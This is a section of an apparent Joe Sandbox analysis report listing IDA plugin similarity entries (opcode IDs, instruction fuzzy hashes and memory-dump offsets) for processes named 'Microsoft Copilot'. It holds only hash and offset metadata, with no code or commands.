                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2L_^
                                                                                      • API String ID: 0-3004606202
                                                                                      • Opcode ID: c2d1be68cfbd4e2f6c0f12087d4d516f84e2030e589d9e21963d7dde4dd0c500
                                                                                      • Instruction ID: 47bc24c3f44075041866c7201d25b4f793b6f2994b83044db91c3db170eb537c
                                                                                      • Opcode Fuzzy Hash: c2d1be68cfbd4e2f6c0f12087d4d516f84e2030e589d9e21963d7dde4dd0c500
                                                                                      • Instruction Fuzzy Hash: 3D51E8A2D0A65A8FE741B7BCE8964F9BBB0EF43324B08417AD08DD60B3DE15540AC3D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2L_^
                                                                                      • API String ID: 0-3004606202
                                                                                      • Opcode ID: 06b0dad697b9b6ae92e3f06391f1670aefa56338146405c7461a4768ebce3a21
                                                                                      • Instruction ID: 2394323ba131d4634f966a720b0015a313b00b7991a166166d1ceb2082e7f7d2
                                                                                      • Opcode Fuzzy Hash: 06b0dad697b9b6ae92e3f06391f1670aefa56338146405c7461a4768ebce3a21
                                                                                      • Instruction Fuzzy Hash: DB51D5A2D0A65A8FE741B7BCE8964F97B70DF43324B08417AD08DD61B3EE15540983D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51f0e292c135985b638b80d20bbbf7bae60b09cd45a4ee4290802c0041f2b753
                                                                                      • Instruction ID: 1abac5ac26e92679ef1e47de2b5cd9d6df0fcf9244be7d0d8f70205bac29ca28
                                                                                      • Opcode Fuzzy Hash: 51f0e292c135985b638b80d20bbbf7bae60b09cd45a4ee4290802c0041f2b753
                                                                                      • Instruction Fuzzy Hash: 5431F361909A5ECFE785E7A8D8664FCBBB1FF56200F4441BAD00EE31E7DE25580AC391
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e2ab2f7e3ddd75be99a1adf6140e2c8803dff9a600d4eed76ce76b1c32a8ed1a
                                                                                      • Instruction ID: d0f915c69d515d6881a929c31056fe46542321c3b0a9f18399c3d9d267796113
                                                                                      • Opcode Fuzzy Hash: e2ab2f7e3ddd75be99a1adf6140e2c8803dff9a600d4eed76ce76b1c32a8ed1a
                                                                                      • Instruction Fuzzy Hash: A451F3B2E0952A8BEB45BBBCE4955FC73A1EF85325B40413AD00DC32A7DF39A446C6D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9654b770615c3e1b0b5861514eddfafbe066226475d072da621f4ce624c1736f
                                                                                      • Instruction ID: ae68b0041ac60be72837eff28a3a62c2db7ad5efcff89ccfeb35e15b687af5c3
                                                                                      • Opcode Fuzzy Hash: 9654b770615c3e1b0b5861514eddfafbe066226475d072da621f4ce624c1736f
                                                                                      • Instruction Fuzzy Hash: AC41E3B1B04A2E8FDB45FBB8D8956EDB3A2FF85311F404579D009D32A6DE35A446C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1fe882d0736ac27763bf805de1d739c8d0c6c2085f50c03a8a07ce6d156c6358
                                                                                      • Instruction ID: dfe323506ce770f2c6824e92fa0adade84776dbf07ba42c3c04e66fdb85ae097
                                                                                      • Opcode Fuzzy Hash: 1fe882d0736ac27763bf805de1d739c8d0c6c2085f50c03a8a07ce6d156c6358
                                                                                      • Instruction Fuzzy Hash: 5F31D361B189494FE698EB3CD45A779B6C6EFD9314F0405BEE04EC3293DE68AC428781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ebd5c277a2d30211b1e9e4a2086833e2145872494de9b4e8eacb3b1186b13e12
                                                                                      • Instruction ID: a4fb949a4d5a97b7527df08e4fc2b7e2e768b96ab374bd97ccd4cbf49c497415
                                                                                      • Opcode Fuzzy Hash: ebd5c277a2d30211b1e9e4a2086833e2145872494de9b4e8eacb3b1186b13e12
                                                                                      • Instruction Fuzzy Hash: 0F2154A1B1491A4FFB85B7BCD45E7BCB2D6EF98711F10417AE50EC32D2DE28A8418391
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f02c4c28833a40f37514cc5fdce6c547fc6081709e89da3f07d041e645033c1
                                                                                      • Instruction ID: e5f60194b87ba18e47df7f7292c38da594c9138122641dd2aab7667884f6148d
                                                                                      • Opcode Fuzzy Hash: 2f02c4c28833a40f37514cc5fdce6c547fc6081709e89da3f07d041e645033c1
                                                                                      • Instruction Fuzzy Hash: 86214FB4A1851D8FD789FB28C0959A9BB73AF88304B904568EC09D33AFEF386911C750
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3051adccd51b0b6760b638ad44add0b0e79a4347161b4b20e855242f0a3d727d
                                                                                      • Instruction ID: 903c3c9c711f992c5445d440cb48bdb39b8772f62ef3579daa1beecab8086337
                                                                                      • Opcode Fuzzy Hash: 3051adccd51b0b6760b638ad44add0b0e79a4347161b4b20e855242f0a3d727d
                                                                                      • Instruction Fuzzy Hash: CF01470880E6A98FF785A33888554317FE1CF96211B0840AFE88DD60A7D94A984883C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 36aae5802aad17e9a02c0723c0684d6dcf35450c9de0424e88b729e9b42cccf3
                                                                                      • Instruction ID: a6636640696892b354a9b8e07d39e4727cc3708da56f9fdb08c727e61c3d97e3
                                                                                      • Opcode Fuzzy Hash: 36aae5802aad17e9a02c0723c0684d6dcf35450c9de0424e88b729e9b42cccf3
                                                                                      • Instruction Fuzzy Hash: 5B41E6B6B08A1D8FEB44FBBDD455AED77A1FF84321B40457AD008C7292EE34A446C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec05d80c32dc5af4c70696cd0f73bfca66cebc322d53e87e3280c73bad16a277
                                                                                      • Instruction ID: 4c92b25d497e0b87f5d04094f46eedff1bdf89a9dc8366f9879c24b7a1d247d5
                                                                                      • Opcode Fuzzy Hash: ec05d80c32dc5af4c70696cd0f73bfca66cebc322d53e87e3280c73bad16a277
                                                                                      • Instruction Fuzzy Hash: 5431D361B189494FF798EB2CD45AB79B6C6EFD9315F0405BEE04EC3293EE689C418381
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7893604306447833401824f3a66cb189d6ab506f1f3776f7aebed840e1441a9d
                                                                                      • Instruction ID: eb7d1702cf566906e9b3958f30e6fe02e0ef0404f7e23b950c74122f32e9ace6
                                                                                      • Opcode Fuzzy Hash: 7893604306447833401824f3a66cb189d6ab506f1f3776f7aebed840e1441a9d
                                                                                      • Instruction Fuzzy Hash: 792166A1B1491A4FFB84B7BCD45E7BCB2D6EF98751F10417AE50DC3292EE28A8418391
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 91c04e030efc88401b73c58da765504dce934bf39d9cbb6193693933f724a446
                                                                                      • Instruction ID: 122a0a98a49ae0e2e872d0066dfdebe8e288e8e87de815292419d761abaf9516
                                                                                      • Opcode Fuzzy Hash: 91c04e030efc88401b73c58da765504dce934bf39d9cbb6193693933f724a446
                                                                                      • Instruction Fuzzy Hash: 172192B169861D4FD744EB2DD0969B9BF72FF88220B8545ACE809CB3ABDF346900C744
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1183d140035f282d72cb22a40cff422e947e6c26c2f13b538e9639c951ac577f
                                                                                      • Instruction ID: 6b5317c3be8904284db3e9f71936f1b81e477ab894957d4b630039532a6aac55
                                                                                      • Opcode Fuzzy Hash: 1183d140035f282d72cb22a40cff422e947e6c26c2f13b538e9639c951ac577f
                                                                                      • Instruction Fuzzy Hash: 8701475580E7A14FF745A33898554717FE0CF96221F0840ABE88CCA0A7EC0AA94883C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0efc61fd035b4b3bb5111cf9048fcd6ce823c579f0fb733385d5818c7a104b43
                                                                                      • Instruction ID: 1b87c3353a978df9ce6e766ac926048a48a728b0f60fe5af4cd604dfa0613894
                                                                                      • Opcode Fuzzy Hash: 0efc61fd035b4b3bb5111cf9048fcd6ce823c579f0fb733385d5818c7a104b43
                                                                                      • Instruction Fuzzy Hash: 5322A8A1B5CA598FE794E778C4A9679B7D2FF99300F404579E40EC32E2DE39AC018781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e457ea438ccdf1f232879f6a870eae651ee938348f7db1ae05b068c6e010500
                                                                                      • Instruction ID: ab38e773238ac3cec3d53a9702539afa796d9022fc843b6ada25f5c943df2fc0
                                                                                      • Opcode Fuzzy Hash: 0e457ea438ccdf1f232879f6a870eae651ee938348f7db1ae05b068c6e010500
                                                                                      • Instruction Fuzzy Hash: 487128A2A0D6960FE352B37CE4599F96B95DF8732470841BBD4CCCB0B3EE0858478395
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 801e365cf3057e9b27be35357c05445827e0ebded78e19107890a7b7ffd0a1c5
                                                                                      • Instruction ID: 4ffc7a507fddacb8c7538df1aeb2f7e11ac881fccdccfefdbfe1e15f9d61befc
                                                                                      • Opcode Fuzzy Hash: 801e365cf3057e9b27be35357c05445827e0ebded78e19107890a7b7ffd0a1c5
                                                                                      • Instruction Fuzzy Hash: 53513355A5E6C58FE786A778C8246757FE9DF87215B0804FBE0CDC3293DD08484AC382
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;M_$<M_^
                                                                                      • API String ID: 0-3421805066
                                                                                      • Opcode ID: 73054ae3dbe537e7e16551993602aa2e7585cabb0a0d36e926dca0994c040115
                                                                                      • Instruction ID: ebc9480c3ae005e6ccce73e555a12dd4c7253eb51753e854dfb8e34b2f12c390
                                                                                      • Opcode Fuzzy Hash: 73054ae3dbe537e7e16551993602aa2e7585cabb0a0d36e926dca0994c040115
                                                                                      • Instruction Fuzzy Hash: 464106F2A0D1598FD304EB78E4A99EA7BA1EF8531474045BAD45CC73A3EF386845CB84
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2M_^
                                                                                      • API String ID: 0-3000290509
                                                                                      • Opcode ID: af707ea9abbae96161be9612dd2ed677873c9fb01d60a237ba60ee3e14662666
                                                                                      • Instruction ID: 69dd7c72b3784656d1f58c69df478f82840f461126bc97670ed3e43e04bcf2e2
                                                                                      • Opcode Fuzzy Hash: af707ea9abbae96161be9612dd2ed677873c9fb01d60a237ba60ee3e14662666
                                                                                      • Instruction Fuzzy Hash: FE51C7A2D0E6598FE701A7BCE8A54F9BF70EF43324B0842B7D48CD61B3DE1558098794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2M_^
                                                                                      • API String ID: 0-3000290509
                                                                                      • Opcode ID: 8f329953aa86d2ad48036c1d165d06120e57e517ac505b661b975d497dc0ea73
                                                                                      • Instruction ID: fc9704bc2070a8fcffe9d7f9b90d94fd70a4869b43dda5c1adbe41359eba85a7
                                                                                      • Opcode Fuzzy Hash: 8f329953aa86d2ad48036c1d165d06120e57e517ac505b661b975d497dc0ea73
                                                                                      • Instruction Fuzzy Hash: EF51D6A2D0E65A4FE701A7BCE8954E9BF70EF43324B0842B7D48CD61B3EE1558098794
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ba6d230b7ec3aaa850cf97e53a4ed10fa7fc45fd8e8a62ecdcce9c388aba04d
                                                                                      • Instruction ID: 414409b9410dc07eac00b62761c58bba93b72ad26c0e2e39a6dd8a0f87c3cb9c
                                                                                      • Opcode Fuzzy Hash: 2ba6d230b7ec3aaa850cf97e53a4ed10fa7fc45fd8e8a62ecdcce9c388aba04d
                                                                                      • Instruction Fuzzy Hash: 7831CD62D0DA5E8FE745E768D8650FDBFB1EF46200F4502BAD409E32A2DE25A8098791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df6f83beb7352dd3eb7984c45b8f781a035feeaba14fee96b58d96a807ec6d3c
                                                                                      • Instruction ID: 7828d2abf672b6e915d14c69049d2d780ca216778fcdf94273e7dc3a215d0c73
                                                                                      • Opcode Fuzzy Hash: df6f83beb7352dd3eb7984c45b8f781a035feeaba14fee96b58d96a807ec6d3c
                                                                                      • Instruction Fuzzy Hash: A451C7B2A0D52E8BEB04BBBCE4955EDB3A1EF95325B40427AD40CC72A3DF35A445C784
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 65353487791a1e46de56ba298a06710c7b5ab9b3f318fe8ce34573ec51062e99
                                                                                      • Instruction ID: d14d4bab08916981bf3ad5f203a61c5276b13801b925514dd0734c79fdef6e8c
                                                                                      • Opcode Fuzzy Hash: 65353487791a1e46de56ba298a06710c7b5ab9b3f318fe8ce34573ec51062e99
                                                                                      • Instruction Fuzzy Hash: 7B41E7B2B0952D8FDB44FBB8D8556EDB7A1FF89311F40467AD409C3292DE35A446C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b03d48f4d04a25651be0ede4bd519f21558ffd17f42f94cd0ae2652d100d977d
                                                                                      • Instruction ID: 10d7e1455adf8c4f8577dd9c1e9f0fd8b9830ce1be2ce0430adabcab20da0032
                                                                                      • Opcode Fuzzy Hash: b03d48f4d04a25651be0ede4bd519f21558ffd17f42f94cd0ae2652d100d977d
                                                                                      • Instruction Fuzzy Hash: 1F31B262B1C9494FE798EB2CD45A779B6C6EFD9315F0405BEE04EC3293DE689C428381
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8e4cdd474496f12165905b01adeeca2e4b1654b9edd3b57ae41f205dcaeef19
                                                                                      • Instruction ID: 06c94fbfcc73cb2d181afc0569b924cee9f252a5312969f7680ce7d1f107a529
                                                                                      • Opcode Fuzzy Hash: a8e4cdd474496f12165905b01adeeca2e4b1654b9edd3b57ae41f205dcaeef19
                                                                                      • Instruction Fuzzy Hash: 4F2157A1B1491A4FFB84B7FCD45E7BCB2D6EF98711F1042B6E50DC3296DE2898418381
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e601c4e4c4b918c516457c89b28881b56eebd2f04103197f99d29d1b34035752
                                                                                      • Instruction ID: 957e10130afac642c9d99fe539a55b89daf077b796c3822737d93a99e6407b43
                                                                                      • Opcode Fuzzy Hash: e601c4e4c4b918c516457c89b28881b56eebd2f04103197f99d29d1b34035752
                                                                                      • Instruction Fuzzy Hash: 992174B565C5994FD744EB28D0A59ABBF73FF8C200B9144A8E928C33ABDF345900C740
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 683b5f3f0e7eeedc8c51d3cb0ae08156f6983efb7c0f31f1d8a5c0ddddcfbde3
                                                                                      • Instruction ID: 0c58ad9322bdd68e024a7d63c8684b0fb5611ebbc94fb01cec3458f189a6a410
                                                                                      • Opcode Fuzzy Hash: 683b5f3f0e7eeedc8c51d3cb0ae08156f6983efb7c0f31f1d8a5c0ddddcfbde3
                                                                                      • Instruction Fuzzy Hash: 4601424880EBA18EF745A338D8555327FE0CF96211B0840ABE88CD71A7D80AAD4893C3